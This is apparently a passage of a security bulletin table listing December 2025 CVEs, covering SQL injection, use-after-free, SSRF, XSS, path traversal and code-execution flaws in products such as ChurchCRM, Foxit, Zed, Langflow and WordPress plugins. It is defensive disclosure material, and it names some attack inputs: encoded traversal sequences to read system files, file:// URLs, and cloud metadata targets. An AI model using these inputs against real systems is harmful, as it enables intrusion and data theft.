| OSC--ondemand | Open OnDemand provides remote web access to supercomputers. In versions 4.0.8 and prior, the Apache proxy allows sensitive headers to be passed to origin servers. This means malicious users can create an origin server on a compute node that records these headers when unsuspecting users connect to it. Maintainers anticipate a patch in a 4.1 release. Workarounds exist for 4.0.x versions. Using `custom_location_directives` in `ood_portal.yml` in version 4.0.x (not available for versions below 4.0), centers can unset and/or edit these headers. Note that `OIDCPassClaimsAs both` is the default and centers can set `OIDCPassClaimsAs` to `none` or `environment` to stop passing these headers to the client. Centers that have an OIDC provider with the `OIDCPassClaimsAs` `none` or `environment` settings can adjust the settings using guidance provided in GHSA-2cwp-8g29-9q32 to unset the mod_auth_openidc_session cookies. | 2025-12-17 | 7.6 | CVE-2025-66029 | https://github.com/OSC/ondemand/security/advisories/GHSA-2cwp-8g29-9q32 |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Prior to version 6.5.3, a SQL injection vulnerability exists in the `src/UserEditor.php` file. When an administrator saves a user's configuration settings, the keys of the `type` POST parameter array are not properly sanitized or type-casted before being used in multiple SQL queries. This allows a malicious or compromised administrator account to execute arbitrary SQL commands, including time-based blind SQL injection attacks, to directly interact with the database. The vulnerability is located in `src/UserEditor.php` within the logic that handles saving user-specific configuration settings. The `type` parameter from the POST request is processed as an array. The code iterates through this array and uses `key($type)` to extract the array key, which is expected to be a numeric ID. This key is then assigned to the `$id` variable. The `$id` variable is subsequently concatenated directly into a `SELECT` and an `UPDATE` SQL query without any sanitization or validation, making it an injection vector. Although the vulnerability requires administrator privileges to exploit, it allows a malicious or compromised admin account to execute arbitrary SQL queries. This can be used to bypass any application-level logging or restrictions, directly manipulate the database, exfiltrate, modify, or delete all data (including other user credentials, financial records, and personal information), and could potentially lead to further system compromise, such as writing files to the server, depending on the database's configuration and user privileges. Version 6.5.3 patches the issue. | 2025-12-17 | 7.2 | CVE-2025-66396 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-whpp-wx64-4qp9 |
| Foxit Software Inc.--Foxit PDF Editor | A use-after-free vulnerability exists in the AcroForm handling of Foxit PDF Reader and Foxit PDF Editor before 2025.2.1, 14.0.1, and 13.2.1 on Windows. When opening a PDF containing specially crafted JavaScript, a pointer to memory that has already been freed may be accessed or dereferenced, potentially allowing a remote attacker to execute arbitrary code. | 2025-12-19 | 7.8 | CVE-2025-66493 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--Foxit PDF Reader | A use-after-free vulnerability exists in the PDF file parsing of Foxit PDF Reader before 2025.2.1, 14.0.1, and 13.2.1 on Windows. A PDF object managed by multiple parent objects could be freed while still being referenced, potentially allowing a remote attacker to execute arbitrary code. | 2025-12-19 | 7.8 | CVE-2025-66494 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--Foxit PDF Reader | A use-after-free vulnerability exists in the annotation handling of Foxit PDF Reader before 2025.2.1, 14.0.1, and 13.2.1 on Windows and MacOS. When opening a PDF containing specially crafted JavaScript, a pointer to memory that has already been freed may be accessed or dereferenced, potentially allowing a remote attacker to execute arbitrary code. | 2025-12-19 | 7.8 | CVE-2025-66495 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--Foxit PDF Reader | A heap-based buffer overflow vulnerability exists in the PDF parsing of Foxit PDF Reader when processing specially crafted JBIG2 data. An integer overflow in the calculation of the image buffer size may occur, potentially allowing a remote attacker to execute arbitrary code. | 2025-12-19 | 7.8 | CVE-2025-66499 | https://www.foxit.com/support/security-bulletins.html |
| homarr-labs--homarr | Homarr is an open-source dashboard. Prior to version 1.45.3, it was possible to craft an input which allowed privilege escalation and getting access to groups of other users due to missing sanitization of inputs in ldap search query. The vulnerability could impact all instances using ldap authentication where a malicious actor had access to a user account. Version 1.45.3 has a patch for the issue. | 2025-12-17 | 7.5 | CVE-2025-67493 | https://github.com/homarr-labs/homarr/security/advisories/GHSA-59gp-q3xx-489q |
| Aiven-Open--myhoard | MyHoard is a daemon for creating, managing and restoring MySQL backups. Starting in version 1.0.1 and prior to version 1.3.0, in some cases, myhoard logs the whole backup info, including the encryption key. Version 1.3.0 fixes the issue. As a workaround, direct logs into /dev/null. | 2025-12-18 | 7.1 | CVE-2025-67745 | https://github.com/Aiven-Open/myhoard/security/advisories/GHSA-v42r-6hr9-4hcr https://github.com/Aiven-Open/myhoard/commit/fac89793bfc8c81ae040aadf5292f5d0100b6640 |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Prior to version 6.5.0, a SQL injection vulnerability exists in the `EventEditor.php` file. When creating a new event and selecting an event type, the `EN_tyid` POST parameter is not sanitized. This allows an authenticated user with event management permissions (`isAddEvent`) to execute arbitrary SQL queries. Version 6.5.0 fixes the issue. | 2025-12-16 | 7.2 | CVE-2025-67751 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-wxcc-gvfv-56fg https://github.com/ChurchCRM/CRM/commit/2d6cf7aed9af1b9b47e125d1a2266f8e2a88f3fd |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. In versions prior to 6.5.3, a SQL injection vulnerability exists in the `eGive.php` file within the "ReImport" functionality. An authenticated user with finance privileges can execute arbitrary SQL queries by manipulating the `MissingEgive_FamID_...` POST parameter. This can lead to unauthorized data access, modification, or deletion within the database. Version 6.5.3 has a patch for the issue. | 2025-12-17 | 7.2 | CVE-2025-68111 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-c4vm-87vf-hmx9 |
| vitejs--vite-plugin-react | @vitejs/plugin-rsc provides React Server Components (RSC) support for Vite. Prior to version 0.5.8, the `/__vite_rsc_findSourceMapURL` endpoint in `@vitejs/plugin-rsc` allows unauthenticated arbitrary file read during development mode. An attacker can read any file accessible to the Node.js process by sending a crafted HTTP request with a `file://` URL in the `filename` query parameter. Version 0.5.8 fixes the issue. | 2025-12-16 | 7.5 | CVE-2025-68155 | https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-g239-q96q-x4qm https://github.com/facebook/react/pull/29708 https://github.com/facebook/react/pull/30741 https://github.com/vitejs/vite-plugin-react/commit/582fba0b9a52b13fcff6beaaa3bfbd532bc5359d |
| expr-lang--expr | Expr is an expression language and expression evaluation for Go. Prior to version 1.17.7, several builtin functions in Expr, including `flatten`, `min`, `max`, `mean`, and `median`, perform recursive traversal over user-provided data structures without enforcing a maximum recursion depth. If the evaluation environment contains deeply nested or cyclic data structures, these functions may recurse indefinitely until they exceed the Go runtime stack limit. This results in a stack overflow panic, causing the host application to crash. While exploitability depends on whether an attacker can influence or inject cyclic or pathologically deep data into the evaluation environment, this behavior represents a denial-of-service (DoS) risk and affects overall library robustness. Instead of returning a recoverable evaluation error, the process may terminate unexpectedly. In affected versions, evaluation of expressions that invoke certain builtin functions on untrusted or insufficiently validated data structures can lead to a process-level crash due to stack exhaustion. This issue is most relevant in scenarios where Expr is used to evaluate expressions against externally supplied or dynamically constructed environments; cyclic references (direct or indirect) can be introduced into arrays, maps, or structs; and there are no application-level safeguards preventing deeply nested input data. In typical use cases with controlled, acyclic data, the issue may not manifest. However, when present, the resulting panic can be used to reliably crash the application, constituting a denial of service. The issue has been fixed in version v1.17.7 of Expr. The patch introduces a maximum recursion depth limit for affected builtin functions. When this limit is exceeded, evaluation aborts gracefully and returns a descriptive error instead of panicking. Additionally, the maximum depth can be customized by users via `builtin.MaxDepth`, allowing applications with legitimate deep structures to raise the limit in a controlled manner. Users are strongly encouraged to upgrade to the patched release, which includes both the recursion guard and comprehensive test coverage to prevent regressions. For users who cannot immediately upgrade, some mitigations are recommended: ensure that evaluation environments cannot contain cyclic references, validate or sanitize externally supplied data structures before passing them to Expr, and/or wrap expression evaluation with panic recovery to prevent a full process crash (as a last-resort defensive measure). These workarounds reduce risk but do not fully eliminate the issue without the patch. | 2025-12-16 | 7.5 | CVE-2025-68156 | https://github.com/expr-lang/expr/security/advisories/GHSA-cfpf-hrx2-8rv6 https://github.com/expr-lang/expr/pull/870 |
| WeblateOrg--weblate | Weblate is a web based localization tool. In versions prior to 5.15.1, it was possible to read arbitrary files from the server file system using crafted symbolic links in the repository. Version 5.15.1 fixes the issue. | 2025-12-18 | 7.7 | CVE-2025-68279 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-g925-f788-4jh7 https://github.com/WeblateOrg/weblate/pull/17331 https://github.com/WeblateOrg/weblate/pull/17356 https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.15.1 |
| Elastic--Kibana | Improper neutralization of input during web page generation ('Cross-site Scripting') (CWE-79) allows an authenticated user to embed a malicious script in content that will be served to web browsers causing cross-site scripting (XSS) (CAPEC-63) via a method in Vega bypassing a previous Vega XSS mitigation. | 2025-12-18 | 7.2 | CVE-2025-68385 | https://discuss.elastic.co/t/kibana-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-34/384182 |
| storybookjs--storybook | Storybook is a frontend workshop for building user interface components and pages in isolation. A vulnerability present starting in versions 7.0.0 and prior to versions 7.6.21, 8.6.15, 9.1.17, and 10.1.10 relates to Storybook's handling of environment variables defined in a `.env` file, which could, in specific circumstances, lead to those variables being unexpectedly bundled into the artifacts created by the `storybook build` command. When a built Storybook is published to the web, the bundle's source is viewable, thus potentially exposing those variables to anyone with access. For a project to potentially be vulnerable to this issue, it must build the Storybook (i.e. run `storybook build` directly or indirectly) in a directory that contains a `.env` file (including variants like `.env.local`) and publish the built Storybook to the web. Storybooks built without a `.env` file at build time are not affected, including common CI-based builds where secrets are provided via platform environment variables rather than `.env` files. Storybook runtime environments (i.e. `storybook dev`) are not affected. Deployed applications that share a repo with your Storybook are not affected. Users should upgrade their Storybook, on both their local machines and CI environment, to version 7.6.21, 8.6.15, 9.1.17, or 10.1.10 as soon as possible. Maintainers additionally recommend that users audit for any sensitive secrets provided via `.env` files and rotate those keys. Some projects may have been relying on the undocumented behavior at the heart of this issue and will need to change how they reference environment variables after this update. If a project can no longer read necessary environment variable values, either prefix the variables with `STORYBOOK_` or use the `env` property in Storybook's configuration to manually specify values. In either case, do not include sensitive secrets, as they will be included in the built bundle. | 2025-12-17 | 7.3 | CVE-2025-68429 | https://github.com/storybookjs/storybook/security/advisories/GHSA-8452-54wp-rmv6 https://storybook.js.org/blog/security-advisory |
| zed-industries--zed | Zed, a code editor, has an arbitrary code execution vulnerability in versions prior to 0.218.2-pre. The Zed IDE loads Language Server Protocol (LSP) configurations from the `settings.json` file located within a project's `.zed` subdirectory. A malicious LSP configuration can contain arbitrary shell commands that run on the host system with the privileges of the user running the IDE. This can be triggered when a user opens a project file for which there is an LSP entry. A concerted effort by an attacker to seed a project settings file (`./zed/settings.json`) with malicious language server configurations could result in arbitrary code execution with the user's privileges if the user opens the project in Zed without reviewing the contents. Version 0.218.2-pre fixes the issue by implementing a worktree trust mechanism. As a workaround, users should carefully review the contents of project settings files (`./zed/settings.json`) before opening new projects in Zed. | 2025-12-17 | 7.8 | CVE-2025-68432 | https://github.com/zed-industries/zed/security/advisories/GHSA-29cp-2hmh-hcxj https://zed.dev/blog/secure-by-default |
| zed-industries--zed | Zed, a code editor, has an arbitrary code execution vulnerability in versions prior to 0.218.2-pre. The Zed IDE loads Model Context Protocol (MCP) configurations from the `settings.json` file located within a project's `.zed` subdirectory. A malicious MCP configuration can contain arbitrary shell commands that run on the host system with the privileges of the user running the IDE. This can be triggered automatically without any user interaction besides opening the project in the IDE. Version 0.218.2-pre fixes the issue by implementing a worktree trust mechanism. As a workaround, users should carefully review the contents of project settings files (`./zed/settings.json`) before opening new projects in Zed. | 2025-12-17 | 7.8 | CVE-2025-68433 | https://github.com/zed-industries/zed/security/advisories/GHSA-cv6g-cmxc-vw8j https://zed.dev/blog/secure-by-default |
| Ruijie Networks Co., Ltd.--AP180-PE V3.xx | RG - AP180, Indoor Wall Plate Wireless AP AP180 series provided by Ruijie Networks Co., Ltd. contain an OS command injection vulnerability. An arbitrary OS command may be executed on the product by an attacker who logs in to the CLI service. | 2025-12-18 | 7.2 | CVE-2025-68459 | https://www.ruijie.com.cn/gy/xw-aqtg-gw/930282/ https://jvn.jp/en/vu/JVNVU94068946/ |
| Roundcube--Webmail | Roundcube Webmail before 1.5.12 and 1.6 before 1.6.12 is prone to an information disclosure vulnerability in the HTML style sanitizer. | 2025-12-18 | 7.2 | CVE-2025-68460 | https://roundcube.net/news/2025/12/13/security-updates-1.6.12-and-1.5.12 https://github.com/roundcube/roundcubemail/commit/08de250fba731b634bed188bbe18d2f6ef3c7571 |
| Roundcube--Webmail | Roundcube Webmail before 1.5.12 and 1.6 before 1.6.12 is prone to a Cross-Site-Scripting (XSS) vulnerability via the animate tag in an SVG document. | 2025-12-18 | 7.2 | CVE-2025-68461 | https://roundcube.net/news/2025/12/13/security-updates-1.6.12-and-1.5.12 https://github.com/roundcube/roundcubemail/commit/bfa032631c36b900e7444dfa278340b33cbf7cdb |
| langflow-ai--langflow | Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, Langflow provides an API Request component that can issue arbitrary HTTP requests within a flow. This component takes a user-supplied URL, performs only normalization and basic format checks, and then sends the request using a server-side httpx client. It does not block private IP ranges (127[.]0[.]0[.]1, the 10/172/192 ranges) or cloud metadata endpoints (169[.]254[.]169[.]254), and it returns the response body as the result. Because the flow execution endpoints (/api/v1/run, /api/v1/run/advanced) can be invoked with just an API key, if an attacker can control the API Request URL in a flow, non-blind SSRF is possible, accessing internal resources from the server's network context. This enables requests to, and collection of responses from, internal administrative endpoints, metadata services, and internal databases/services, leading to information disclosure and providing a foothold for further attacks. Version 1.7.0 contains a patch for this issue. | 2025-12-19 | 7.7 | CVE-2025-68477 | https://github.com/langflow-ai/langflow/security/advisories/GHSA-5993-7p27-66g5 |
| langflow-ai--langflow | Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, if an arbitrary path is specified in the request body's `fs_path`, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is. Version 1.7.0 fixes the issue. | 2025-12-19 | 7.1 | CVE-2025-68478 | https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4 |
| Yealink--RPS | Yealink RPS before 2025-06-27 allows unauthorized access to information, including AutoP URL addresses. This was fixed by deploying an enhanced authentication mechanism through a security update to all cloud instances. | 2025-12-21 | 7.4 | CVE-2025-68644 | https://www.yealink.com/en/trust-center/security-bulletins/yealink-unauthorized-access-to-rps-vulnerability https://www.yealink.com/website-service/download/Yealink_RPS_Security_Remediation_Verification_Report.pdf |
| Utarit Informatics Services Inc.--SoliClub | Use of Hard-coded Credentials vulnerability in Utarit Informatics Services Inc. SoliClub allows Authentication Abuse. This issue affects SoliClub: before 5.3.7. | 2025-12-18 | 7.5 | CVE-2025-7358 | https://www.usom.gov.tr/bildirim/tr-25-0466 |
| JabCareer--WP JobHunt | The WP JobHunt plugin for WordPress, used by the JobCareer theme, is vulnerable to unauthorized modification of data due to a missing capability check on the 'cs_update_application_status_callback' function in all versions up to, and including, 7.7. This makes it possible for authenticated attackers, with Candidate-level access and above, to inject cross-site scripting into the 'status' parameter of applied jobs for any user. | 2025-12-20 | 7.6 | CVE-2025-7782 | https://www.wordfence.com/threat-intel/vulnerabilities/id/af063570-43f7-4bf4-850c-21c3bff40ac1?source=cve https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636 |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ticket subjects in all versions up to, and including, 3.3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-21 | 7.2 | CVE-2025-9343 | https://www.wordfence.com/threat-intel/vulnerabilities/id/042d9bc7-50ea-4585-9789-b10ed40b0d14?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3420695%40elex-helpdesk-customer-support-ticket-system&new=3420695%40elex-helpdesk-customer-support-ticket-system&sfp_email=&sfph_mail= |
| Autodesk--Shared Components | A maliciously crafted SLDPRT file, when parsed through certain Autodesk products, can force a Memory corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9452 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted PRT file, when parsed through certain Autodesk products, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9453 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted PRT file, when parsed through certain Autodesk products, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9454 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted CATPRODUCT file, when parsed through certain Autodesk products, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9455 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted SLDPRT file, when parsed through certain Autodesk products, can force a Memory corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9456 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted PRT file, when parsed through certain Autodesk products, can force a Memory corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9457 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted SLDPRT file, when parsed through certain Autodesk products, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9459 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted SLDPRT file, when parsed through certain Autodesk products, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9460 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Kentico--Xperience | A CRLF injection vulnerability in Kentico Xperience allows attackers to manipulate URL query string redirects via improper encoding in the routing engine. This could enable header injection and potentially facilitate further web application attacks. | 2025-12-18 | 6.5 | CVE-2022-50682 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.79 Routing Engine CRLF Injection |
| Palantir--com.palantir.acme.gaia:gaia | Gotham Gaia application was found to be exposing multiple unauthenticated endpoints. | 2025-12-19 | 6.8 | CVE-2023-30971 | https://palantir.safebase.us/?tcuUid=4d833960-b5a8-4750-abef-9c447fcd89fb |
| websitebaker--WebsiteBaker | WebsiteBaker 2.13.3 contains a directory traversal vulnerability that allows authenticated attackers to delete arbitrary files by manipulating directory path parameters. Attackers can send crafted GET requests to /admin/media/delete.php with directory traversal sequences to delete files outside the intended directory. | 2025-12-16 | 6.5 | CVE-2023-53902 | ExploitDB-51554 WebsiteBaker Product Webpage VulnCheck Advisory: WebsiteBaker 2.13.3 Directory Traversal via Media Delete Endpoint |
| Bludit--Backup Plugin | Bludit versions before 3.13.1 contain an authenticated file download vulnerability in the Backup Plugin that allows logged-in users to access arbitrary files. Attackers can exploit the plugin's download functionality by manipulating file path parameters to read sensitive system files through directory traversal. | 2025-12-17 | 6.5 | CVE-2023-53907 | ExploitDB-51541 Official Product Webpage VulnCheck Advisory: Bludit 3.13.1 Authenticated Arbitrary File Download via Backup Plugin |
| Belden--HiSecOS | HiSecOS 04.0.01 contains a privilege escalation vulnerability that allows authenticated users to modify their access role through XML-based NETCONF configuration. Attackers can send crafted XML payloads to the /mops_data endpoint with a specific role value to elevate their user privileges to administrative level. | 2025-12-17 | 6.5 | CVE-2023-53908 | ExploitDB-51537 Official Product Webpage VulnCheck Advisory: HiSecOS 04.0.01 Privilege Escalation via User Role Modification |
| BiniSoft--USB Flash Drives Control | USB Flash Drives Control 4.1.0.0 contains an unquoted service path vulnerability in its service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\USB Flash Drives Control\usbcs.exe' to inject malicious executables and escalate privileges on Windows systems. | 2025-12-17 | 6.2 | CVE-2023-53912 | ExploitDB-51508 Official Product Webpage VulnCheck Advisory: USB Flash Drives Control 4.1.0.0 Unquoted Service Path Privilege Escalation |
| powerstonegh--Affiliate Me | Affiliate Me version 5.0.1 contains a SQL injection vulnerability in the admin.php endpoint that allows authenticated administrators to manipulate database queries. Attackers can exploit the 'id' parameter with crafted union-based queries to extract sensitive user information including usernames and password hashes. | 2025-12-17 | 6.5 | CVE-2023-53917 | ExploitDB-51468 Official Vendor Homepage VulnCheck Advisory: Affiliate Me 5.0.1 SQL Injection Vulnerability via Admin Panel |
| Easyphp--EasyPHP Webserver | EasyPHP Webserver 14.1 contains a path traversal vulnerability that allows remote users with low privileges to access files outside the document root by bypassing SecurityManager restrictions. Attackers can send GET requests with encoded directory traversal sequences like /..%5c..%5c to read system files such as /windows/win.ini. | 2025-12-18 | 6.5 | CVE-2023-53944 | ExploitDB-51430 Official Product Homepage VulnCheck Advisory: EasyPHP Webserver 14.1 Path Traversal via Directory Traversal Sequences |
| Websitebaker--WebsiteBaker | WebsiteBaker 2.13.3 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts when creating web pages. Attackers can craft malicious payloads in page titles that execute arbitrary JavaScript when the page is viewed by other users. | 2025-12-19 | 6.4 | CVE-2023-53953 | ExploitDB-51349 Official Product Homepage VulnCheck Advisory: WebsiteBaker 2.13.3 Stored Cross-Site Scripting via Page Creation |
| Actfax--ActFax | ActFax 10.10 contains an unquoted service path vulnerability that allows local attackers to potentially escalate privileges by exploiting the ActiveFaxServiceNT service configuration. Attackers with write permissions to Program Files directories can inject a malicious ActSrvNT.exe executable to gain elevated system access when the service restarts. | 2025-12-19 | 6.2 | CVE-2023-53954 | ExploitDB-51332 Official Product Homepage VulnCheck Advisory: ActFax 10.10 Unquoted Path Services Privilege Escalation Vulnerability |
| Milestone Systems--XProtect VMS | Missing Authorization vulnerability in Milestone Systems XProtect VMS allows users with read-only access to Management Server to have full read/write access to MIP Webhooks API. | 2025-12-16 | 6.3 | CVE-2025-0836 | https://supportcommunity.milestonesys.com/s/article/CVE-2025-0836-XProtect-MIP-API-broken-access-control?language=en_US https://supportcommunity.milestonesys.com/s/article/XProtect-VMS-cumulative-patches-complete-list?language=en_US |
| elemntor--Elementor Website Builder More Than Just a Page Builder | The Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Text Path widget in all versions up to, and including, 3.33.3 due to insufficient neutralization of user-supplied input used to build SVG markup inside the widget. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-16 | 6.4 | CVE-2025-11220 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1a73c078-ce66-4131-8bd7-6fd48fc9fa84?source=cve https://plugins.trac.wordpress.org/changeset/3414494/elementor |
| rustaurius--Five Star Restaurant Reservations WordPress Booking Plugin | The Five Star Restaurant Reservations - WordPress Booking Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rtb-name' parameter in all versions up to, and including, 2.7.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-21 | 6.1 | CVE-2025-11496 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1889c1ba-f49f-474c-8d0a-0ae46fb92deb?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3408446%40restaurant-reservations&new=3408446%40restaurant-reservations&sfp_email=&sfph_mail= |
| Zohocorp--ManageEngine ADManager Plus | Zohocorp ManageEngine ADManager Plus versions before 8025 are vulnerable to NTLM Hash Exposure. This vulnerability is exploitable only by technicians who have the "Impersonate as Admin" option enabled. | 2025-12-15 | 6.4 | CVE-2025-11670 | https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2025-11670.html |
| extendthemes--Colibri Page Builder | The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the colibri_blog_posts shortcode in all versions up to, and including, 1.0.345 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-19 | 6.4 | CVE-2025-11747 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e3305b39-5f7b-493b-80b5-cb925c2710c1?source=cve https://plugins.trac.wordpress.org/browser/colibri-page-builder/trunk/extend-builder/shortcodes/blog-posts.php#L251 https://plugins.trac.wordpress.org/changeset/3421590/colibri-page-builder/trunk/extend-builder/shortcodes/blog-posts.php |
| zephyrproject-rtos--Zephyr | An integer overflow condition exists in the Bluetooth Host stack, within the bt_br_acl_recv routine, a critical path for processing inbound BR/EDR L2CAP traffic. | 2025-12-15 | 6.5 | CVE-2025-12035 | https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-p793-3456-h7w3 |
| codersaiful--Product Table for WooCommerce | The Product Table for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'search_key' parameter in all versions up to, and including, 5.0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-21 | 6.1 | CVE-2025-12398 | https://www.wordfence.com/threat-intel/vulnerabilities/id/35790e70-6e96-4ffe-9d4e-828dd649e8c0?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3420662%40woo-product-table&new=3420662%40woo-product-table&sfp_email=&sfph_mail= |
| kaizencoders--Attachments Handler | The Attachments Handler plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URL in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-20 | 6.1 | CVE-2025-12581 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dc948f30-2fc2-40dd-878e-28e0eac857c7?source=cve https://plugins.trac.wordpress.org/browser/attachments-handler/trunk/core/admin_table.class.php#L170 https://wordpress.org/plugins/attachments-handler/ |
| Mattermost--Mattermost | Mattermost versions 11.0.x <= 11.0.4, 10.12.x <= 10.12.2, 10.11.x <= 10.11.6 fail to check the WebSocket request field for proper UTF-8 format, which allows an attacker to crash the Calls plug-in by sending a malformed request. | 2025-12-17 | 6.5 | CVE-2025-12689 | https://mattermost.com/security-updates |
| awsmin--Embed Any Document Embed PDF, Word, PowerPoint and Excel Files | The Embed Any Document - Embed PDF, Word, PowerPoint and Excel Files plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sanitize_pdf_src function regex bypass in all versions up to, and including, 2.7.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-18 | 6.4 | CVE-2025-12885 | https://www.wordfence.com/threat-intel/vulnerabilities/id/efbdf0f0-6b38-418c-b3fb-396f89ada34f?source=cve https://plugins.trac.wordpress.org/changeset/3406443/ |
| netweblogic--Events Manager Calendar, Bookings, Tickets, and more! | The Events Manager - Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'events_list_grouped' shortcode in all versions up to, and including, 7.2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-18 | 6.4 | CVE-2025-12976 | https://www.wordfence.com/threat-intel/vulnerabilities/id/17e853b2-c7ab-478c-9c89-d8e3a42d1a42?source=cve https://plugins.trac.wordpress.org/browser/events-manager/tags/7.2.2.1/em-shortcode.php#L119 https://plugins.trac.wordpress.org/browser/events-manager/tags/7.2.2.1/em-functions.php#L933 https://plugins.trac.wordpress.org/browser/events-manager/tags/7.2.2.1/templates/templates/events-list-grouped.php https://plugins.trac.wordpress.org/browser/events-manager/tags/7.2.2.1/classes/em-events.php#L423 https://plugins.trac.wordpress.org/changeset/3413776/ |
